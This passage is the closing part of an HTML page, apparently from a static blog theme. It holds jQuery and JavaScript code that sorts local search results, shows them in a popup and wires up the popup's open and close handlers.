                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  

</body>
</html>
